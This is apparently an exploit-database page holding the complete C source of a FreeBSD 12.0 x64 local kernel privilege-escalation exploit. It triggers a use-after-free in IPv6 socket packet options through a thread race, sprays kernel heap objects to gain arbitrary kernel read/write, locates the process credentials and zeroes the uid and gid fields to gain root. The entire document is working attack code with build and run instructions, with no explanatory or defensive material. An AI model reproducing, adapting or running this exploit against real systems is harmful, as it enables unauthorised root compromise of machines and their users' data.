Share
## https://sploitus.com/exploit?id=PACKETSTORM:158341
/* 
FreeBSD 12.0-RELEASE x64 Kernel Exploit 
 
Usage: 
$ clang -o exploit exploit.c -lpthread 
$ ./exploit 
*/ 
 
#include <errno.h> 
#include <fcntl.h> 
#include <stdio.h> 
#include <string.h> 
#include <stddef.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <pthread.h> 
#define _KERNEL 
#include <sys/event.h> 
#undef _KERNEL 
#define _WANT_FILE 
#include <sys/file.h> 
#include <sys/filedesc.h> 
#include <sys/param.h> 
#include <sys/proc.h> 
#include <sys/socket.h> 
#define _WANT_SOCKET 
#include <sys/socketvar.h> 
#include <netinet/in.h> 
#define _WANT_INPCB 
#include <netinet/in_pcb.h> 
#include <netinet/ip6.h> 
#include <netinet6/ip6_var.h> 
 
// #define FBSD12 
 
#define ELF_MAGIC 0x464c457f 
 
#define IPV6_2292PKTINFO 19 
#define IPV6_2292PKTOPTIONS 25 
 
#define TCLASS_MASTER 0x13370000 
#define TCLASS_SPRAY 0x41 
#define TCLASS_TAINT 0x42 
 
#define NUM_SPRAY_RACE 0x20 
#define NUM_SPRAY 0x100 
#define NUM_KQUEUES 0x100 
 
#ifdef FBSD12 
#define ALLPROC_OFFSET 0x1df3c38 
#else 
#define ALLPROC_OFFSET 0xf01e40 
#endif 
 
#define PKTOPTS_PKTINFO_OFFSET (offsetof(struct ip6_pktopts, ip6po_pktinfo)) 
#define PKTOPTS_RTHDR_OFFSET (offsetof(struct ip6_pktopts, ip6po_rhinfo.ip6po_rhi_rthdr)) 
#define PKTOPTS_TCLASS_OFFSET (offsetof(struct ip6_pktopts, ip6po_tclass)) 
 
#define PROC_LIST_OFFSET (offsetof(struct proc, p_list)) 
#define PROC_UCRED_OFFSET (offsetof(struct proc, p_ucred)) 
#define PROC_FD_OFFSET (offsetof(struct proc, p_fd)) 
#define PROC_PID_OFFSET (offsetof(struct proc, p_pid)) 
 
#ifdef FBSD12 
 
#define FILEDESC_FILES_OFFSET (offsetof(struct filedesc, fd_files)) 
#define FILEDESCENTTBL_OFILES_OFFSET (offsetof(struct fdescenttbl, fdt_ofiles)) 
#define FILEDESCENTTBL_NFILES_OFFSET (offsetof(struct fdescenttbl, fdt_nfiles)) 
#define FILEDESCENT_FILE_OFFSET (offsetof(struct filedescent, fde_file)) 
#define FILE_TYPE_OFFSET (offsetof(struct file, f_type)) 
#define FILE_DATA_OFFSET (offsetof(struct file, f_data)) 
 
#else 
 
#define FILEDESC_OFILES_OFFSET (offsetof(struct filedesc, fd_ofiles)) 
#define FILEDESC_NFILES_OFFSET (offsetof(struct filedesc, fd_nfiles)) 
#define FILE_TYPE_OFFSET (offsetof(struct file, f_type)) 
#define FILE_DATA_OFFSET (offsetof(struct file, f_data)) 
 
#endif 
 
#define KNOTE_FOP_OFFSET (offsetof(struct knote, kn_fop)) 
#define FILTEROPS_DETACH_OFFSET (offsetof(struct filterops, f_detach)) 
 
#define SOCKET_PCB_OFFSET (offsetof(struct socket, so_pcb)) 
#define INPCB_OUTPUTOPTS_OFFSET (offsetof(struct inpcb, in6p_outputopts)) 
 
int kqueue(void); 
int kevent(int kq, const struct kevent *changelist, int nchanges, 
struct kevent *eventlist, int nevents, 
const struct timespec *timeout); 
 
static uint64_t kernel_base; 
static uint64_t p_ucred, p_fd; 
static uint64_t kevent_addr, pktopts_addr; 
 
static int triggered = 0; 
static int kevent_sock, master_sock, overlap_sock, victim_sock; 
static int spray_sock[NUM_SPRAY]; 
static int kq[NUM_KQUEUES]; 
 
static void hexDump(const void *data, size_t size) { 
size_t i; 
for(i = 0; i < size; i++) { 
printf("%02hhX%c", ((char *)data)[i], (i + 1) % 16 ? ' ' : '\n'); 
} 
printf("\n"); 
} 
 
static int new_socket(void) { 
return socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); 
} 
 
static void build_tclass_cmsg(char *buf, int val) { 
struct cmsghdr *cmsg; 
 
cmsg = (struct cmsghdr *)buf; 
cmsg->cmsg_len = CMSG_LEN(sizeof(int)); 
cmsg->cmsg_level = IPPROTO_IPV6; 
cmsg->cmsg_type = IPV6_TCLASS; 
 
*(int *)CMSG_DATA(cmsg) = val; 
} 
 
static int build_rthdr_msg(char *buf, int size) { 
struct ip6_rthdr *rthdr; 
int len; 
 
len = ((size >> 3) - 1) & ~1; 
size = (len + 1) << 3; 
 
memset(buf, 0, size); 
 
rthdr = (struct ip6_rthdr *)buf; 
rthdr->ip6r_nxt = 0; 
rthdr->ip6r_len = len; 
rthdr->ip6r_type = IPV6_RTHDR_TYPE_0; 
rthdr->ip6r_segleft = rthdr->ip6r_len >> 1; 
 
return size; 
} 
 
static int get_rthdr(int s, char *buf, socklen_t len) { 
return getsockopt(s, IPPROTO_IPV6, IPV6_RTHDR, buf, &len); 
} 
 
static int set_rthdr(int s, char *buf, socklen_t len) { 
return setsockopt(s, IPPROTO_IPV6, IPV6_RTHDR, buf, len); 
} 
 
static int free_rthdr(int s) { 
return set_rthdr(s, NULL, 0); 
} 
 
static int get_tclass(int s) { 
int val; 
socklen_t len = sizeof(val); 
getsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &val, &len); 
return val; 
} 
 
static int set_tclass(int s, int val) { 
return setsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &val, sizeof(val)); 
} 
 
static int get_pktinfo(int s, char *buf) { 
socklen_t len = sizeof(struct in6_pktinfo); 
return getsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, buf, &len); 
} 
 
static int set_pktinfo(int s, char *buf) { 
return setsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, buf, sizeof(struct in6_pktinfo)); 
} 
 
static int set_pktopts(int s, char *buf, socklen_t len) { 
return setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, len); 
} 
 
static int free_pktopts(int s) { 
return set_pktopts(s, NULL, 0); 
} 
 
static uint64_t leak_rthdr_ptr(int s) { 
char buf[0x100]; 
get_rthdr(s, buf, sizeof(buf)); 
return *(uint64_t *)(buf + PKTOPTS_RTHDR_OFFSET); 
} 
 
static uint64_t leak_kmalloc(char *buf, int size) { 
int rthdr_len = build_rthdr_msg(buf, size); 
set_rthdr(master_sock, buf, rthdr_len); 
#ifdef FBSD12 
get_rthdr(master_sock, buf, rthdr_len); 
return *(uint64_t *)(buf + 0x00); 
#else 
return leak_rthdr_ptr(overlap_sock); 
#endif 
} 
 
static void write_to_victim(uint64_t addr) { 
char buf[sizeof(struct in6_pktinfo)]; 
*(uint64_t *)(buf + 0x00) = addr; 
*(uint64_t *)(buf + 0x08) = 0; 
*(uint32_t *)(buf + 0x10) = 0; 
set_pktinfo(master_sock, buf); 
} 
 
static int find_victim_sock(void) { 
char buf[sizeof(struct in6_pktinfo)]; 
 
write_to_victim(pktopts_addr + PKTOPTS_PKTINFO_OFFSET); 
 
for (int i = 0; i < NUM_SPRAY; i++) { 
get_pktinfo(spray_sock[i], buf); 
if (*(uint64_t *)(buf + 0x00) != 0) 
return i; 
} 
 
return -1; 
} 
 
static uint8_t kread8(uint64_t addr) { 
char buf[sizeof(struct in6_pktinfo)]; 
write_to_victim(addr); 
get_pktinfo(victim_sock, buf); 
return *(uint8_t *)buf; 
} 
 
static uint16_t kread16(uint64_t addr) { 
char buf[sizeof(struct in6_pktinfo)]; 
write_to_victim(addr); 
get_pktinfo(victim_sock, buf); 
return *(uint16_t *)buf; 
} 
 
static uint32_t kread32(uint64_t addr) { 
char buf[sizeof(struct in6_pktinfo)]; 
write_to_victim(addr); 
get_pktinfo(victim_sock, buf); 
return *(uint32_t *)buf; 
} 
 
static uint64_t kread64(uint64_t addr) { 
char buf[sizeof(struct in6_pktinfo)]; 
write_to_victim(addr); 
get_pktinfo(victim_sock, buf); 
return *(uint64_t *)buf; 
} 
 
static void kread(void *dst, uint64_t src, size_t len) { 
for (int i = 0; i < len; i++) 
((uint8_t *)dst)[i] = kread8(src + i); 
} 
 
static void kwrite64(uint64_t addr, uint64_t val) { 
int fd = open("/dev/kmem", O_RDWR); 
if (fd >= 0) { 
lseek(fd, addr, SEEK_SET); 
write(fd, &val, sizeof(val)); 
close(fd); 
} 
} 
 
static int kwrite(uint64_t addr, void *buf) { 
write_to_victim(addr); 
return set_pktinfo(victim_sock, buf); 
} 
 
static uint64_t find_kernel_base(uint64_t addr) { 
addr &= ~(PAGE_SIZE - 1); 
while (kread32(addr) != ELF_MAGIC) 
addr -= PAGE_SIZE; 
return addr; 
} 
 
static int find_proc_cred_and_fd(pid_t pid) { 
uint64_t proc = kread64(kernel_base + ALLPROC_OFFSET); 
 
while (proc) { 
if (kread32(proc + PROC_PID_OFFSET) == pid) { 
p_ucred = kread64(proc + PROC_UCRED_OFFSET); 
p_fd = kread64(proc + PROC_FD_OFFSET); 
printf("[+] p_ucred: 0x%lx\n", p_ucred); 
printf("[+] p_fd: 0x%lx\n", p_fd); 
return 0; 
} 
 
proc = kread64(proc + PROC_LIST_OFFSET); 
} 
 
return -1; 
} 
 
#ifdef FBSD12 
 
static uint64_t find_socket_data(int s) { 
uint64_t files, ofiles, fp; 
int nfiles; 
short type; 
 
files = kread64(p_fd + FILEDESC_FILES_OFFSET); 
if (!files) 
return 0; 
 
ofiles = files + FILEDESCENTTBL_OFILES_OFFSET; 
 
nfiles = kread32(files + FILEDESCENTTBL_NFILES_OFFSET); 
if (s < 0 || s >= nfiles) 
return 0; 
 
fp = kread64(ofiles + s * sizeof(struct filedescent) + FILEDESCENT_FILE_OFFSET); 
if (!fp) 
return 0; 
 
type = kread16(fp + FILE_TYPE_OFFSET); 
if (type != DTYPE_SOCKET) 
return 0; 
 
return kread64(fp + FILE_DATA_OFFSET); 
} 
 
#else 
 
static uint64_t find_socket_data(int s) { 
uint64_t ofiles, fp; 
int nfiles; 
short type; 
 
ofiles = kread64(p_fd + FILEDESC_OFILES_OFFSET); 
if (!ofiles) 
return 0; 
 
nfiles = kread32(p_fd + FILEDESC_NFILES_OFFSET); 
if (s < 0 || s >= nfiles) 
return 0; 
 
fp = kread64(ofiles + s * sizeof(struct file *)); 
if (!fp) 
return 0; 
 
type = kread16(fp + FILE_TYPE_OFFSET); 
if (type != DTYPE_SOCKET) 
return 0; 
 
return kread64(fp + FILE_DATA_OFFSET); 
} 
 
#endif 
 
static uint64_t find_socket_pcb(int s) { 
uint64_t f_data; 
 
f_data = find_socket_data(s); 
if (!f_data) 
return 0; 
 
return kread64(f_data + SOCKET_PCB_OFFSET); 
} 
 
static uint64_t find_socket_pktopts(int s) { 
uint64_t in6p; 
 
in6p = find_socket_pcb(s); 
if (!in6p) 
return 0; 
 
return kread64(in6p + INPCB_OUTPUTOPTS_OFFSET); 
} 
 
static void cleanup(void) { 
uint64_t master_pktopts, overlap_pktopts, victim_pktopts; 
 
master_pktopts = find_socket_pktopts(master_sock); 
overlap_pktopts = find_socket_pktopts(overlap_sock); 
victim_pktopts = find_socket_pktopts(victim_sock); 
 
kwrite64(master_pktopts + PKTOPTS_PKTINFO_OFFSET, 0); 
kwrite64(overlap_pktopts + PKTOPTS_RTHDR_OFFSET, 0); 
kwrite64(victim_pktopts + PKTOPTS_PKTINFO_OFFSET, 0); 
} 
 
static void escalate_privileges(void) { 
char buf[sizeof(struct in6_pktinfo)]; 
 
*(uint32_t *)(buf + 0x00) = 0; // cr_uid 
*(uint32_t *)(buf + 0x04) = 0; // cr_ruid 
*(uint32_t *)(buf + 0x08) = 0; // cr_svuid 
*(uint32_t *)(buf + 0x0c) = 1; // cr_ngroups 
*(uint32_t *)(buf + 0x10) = 0; // cr_rgid 
 
kwrite(p_ucred + 4, buf); 
} 
 
static int find_overlap_sock(void) { 
set_tclass(master_sock, TCLASS_TAINT); 
 
for (int i = 0; i < NUM_SPRAY; i++) { 
if (get_tclass(spray_sock[i]) == TCLASS_TAINT) 
return i; 
} 
 
return -1; 
} 
 
static int spray_pktopts(void) { 
for (int i = 0; i < NUM_SPRAY_RACE; i++) 
set_tclass(spray_sock[i], TCLASS_SPRAY); 
 
if (get_tclass(master_sock) == TCLASS_SPRAY) 
return 1; 
 
for (int i = 0; i < NUM_SPRAY_RACE; i++) 
free_pktopts(spray_sock[i]); 
 
return 0; 
} 
 
static void *use_thread(void *arg) { 
char buf[CMSG_SPACE(sizeof(int))]; 
build_tclass_cmsg(buf, 0); 
 
while (!triggered && get_tclass(master_sock) != TCLASS_SPRAY) { 
set_pktopts(master_sock, buf, sizeof(buf)); 
 
#ifdef FBSD12 
usleep(100); 
#endif 
} 
 
triggered = 1; 
return NULL; 
} 
 
static void *free_thread(void *arg) { 
while (!triggered && get_tclass(master_sock) != TCLASS_SPRAY) { 
free_pktopts(master_sock); 
 
#ifdef FBSD12 
if (spray_pktopts()) 
break; 
#endif 
 
usleep(100); 
} 
 
triggered = 1; 
return NULL; 
} 
 
static int trigger_uaf(void) { 
pthread_t th[2]; 
 
pthread_create(&th[0], NULL, use_thread, NULL); 
pthread_create(&th[1], NULL, free_thread, NULL); 
 
while (1) { 
if (spray_pktopts()) 
break; 
 
#ifndef FBSD12 
usleep(100); 
#endif 
} 
 
triggered = 1; 
 
pthread_join(th[0], NULL); 
pthread_join(th[1], NULL); 
 
return find_overlap_sock(); 
} 
 
static int fake_pktopts(uint64_t pktinfo) { 
char buf[0x100]; 
int rthdr_len, tclass; 
 
// Free master_sock's pktopts 
free_pktopts(overlap_sock); 
 
// Spray rthdr's to refill master_sock's pktopts 
rthdr_len = build_rthdr_msg(buf, 0x100); 
for (int i = 0; i < NUM_SPRAY; i++) { 
*(uint64_t *)(buf + PKTOPTS_PKTINFO_OFFSET) = pktinfo; 
*(uint32_t *)(buf + PKTOPTS_TCLASS_OFFSET) = TCLASS_MASTER | i; 
set_rthdr(spray_sock[i], buf, rthdr_len); 
} 
 
tclass = get_tclass(master_sock); 
 
// See if pktopts has been refilled correctly 
if ((tclass & 0xffff0000) != TCLASS_MASTER) { 
printf("[-] Error could not refill pktopts.\n"); 
exit(1); 
} 
 
return tclass & 0xffff; 
} 
 
static void leak_kevent_pktopts(void) { 
char buf[0x800]; 
 
struct kevent kv; 
EV_SET(&kv, kevent_sock, EVFILT_READ, EV_ADD, 0, 5, NULL); 
 
// Free pktopts 
for (int i = 0; i < NUM_SPRAY; i++) 
free_pktopts(spray_sock[i]); 
 
// Leak 0x800 kmalloc addr 
kevent_addr = leak_kmalloc(buf, 0x800); 
printf("[+] kevent_addr: 0x%lx\n", kevent_addr); 
 
// Free rthdr buffer and spray kevents to occupy this location 
free_rthdr(master_sock); 
for (int i = 0; i < NUM_KQUEUES; i++) 
kevent(kq[i], &kv, 1, 0, 0, 0); 
 
// Leak 0x100 kmalloc addr 
pktopts_addr = leak_kmalloc(buf, 0x100); 
printf("[+] pktopts_addr: 0x%lx\n", pktopts_addr); 
 
// Free rthdr buffer and spray pktopts to occupy this location 
free_rthdr(master_sock); 
for (int i = 0; i < NUM_SPRAY; i++) 
set_tclass(spray_sock[i], 0); 
} 
 
int main(int argc, char *argv[]) { 
uint64_t knote, kn_fop, f_detach; 
int idx; 
 
printf("[*] Initializing sockets...\n"); 
 
kevent_sock = new_socket(); 
master_sock = new_socket(); 
 
for (int i = 0; i < NUM_SPRAY; i++) 
spray_sock[i] = new_socket(); 
 
for (int i = 0; i < NUM_KQUEUES; i++) 
kq[i] = kqueue(); 
 
printf("[*] Triggering UAF...\n"); 
idx = trigger_uaf(); 
if (idx == -1) { 
printf("[-] Error could not find overlap sock.\n"); 
exit(1); 
} 
 
// master_sock and overlap_sock point to the same pktopts 
overlap_sock = spray_sock[idx]; 
spray_sock[idx] = new_socket(); 
printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx); 
 
// Reallocate pktopts 
for (int i = 0; i < NUM_SPRAY; i++) { 
free_pktopts(spray_sock[i]); 
set_tclass(spray_sock[i], 0); 
} 
 
// Fake master pktopts 
idx = fake_pktopts(0); 
overlap_sock = spray_sock[idx]; 
spray_sock[idx] = new_socket(); // use new socket so logic in spraying will be easier 
printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx); 
 
// Leak address of some kevent and pktopts 
leak_kevent_pktopts(); 
 
// Fake master pktopts 
idx = fake_pktopts(pktopts_addr + PKTOPTS_PKTINFO_OFFSET); 
overlap_sock = spray_sock[idx]; 
printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx); 
 
idx = find_victim_sock(); 
if (idx == -1) { 
printf("[-] Error could not find victim sock.\n"); 
exit(1); 
} 
 
victim_sock = spray_sock[idx]; 
printf("[+] Victim socket: %x (%x)\n", victim_sock, idx); 
 
printf("[+] Arbitrary R/W achieved.\n"); 
 
knote = kread64(kevent_addr + kevent_sock * sizeof(uintptr_t)); 
kn_fop = kread64(knote + KNOTE_FOP_OFFSET); 
f_detach = kread64(kn_fop + FILTEROPS_DETACH_OFFSET); 
 
printf("[+] knote: 0x%lx\n", knote); 
printf("[+] kn_fop: 0x%lx\n", kn_fop); 
printf("[+] f_detach: 0x%lx\n", f_detach); 
 
printf("[+] Finding kernel base...\n"); 
kernel_base = find_kernel_base(f_detach); 
printf("[+] Kernel base: 0x%lx\n", kernel_base); 
 
printf("[+] Finding process cred and fd...\n"); 
find_proc_cred_and_fd(getpid()); 
 
printf("[*] Escalating privileges...\n"); 
escalate_privileges(); 
 
printf("[*] Cleaning up...\n"); 
cleanup(); 
 
printf("[+] Done.\n"); 
 
return 0; 
}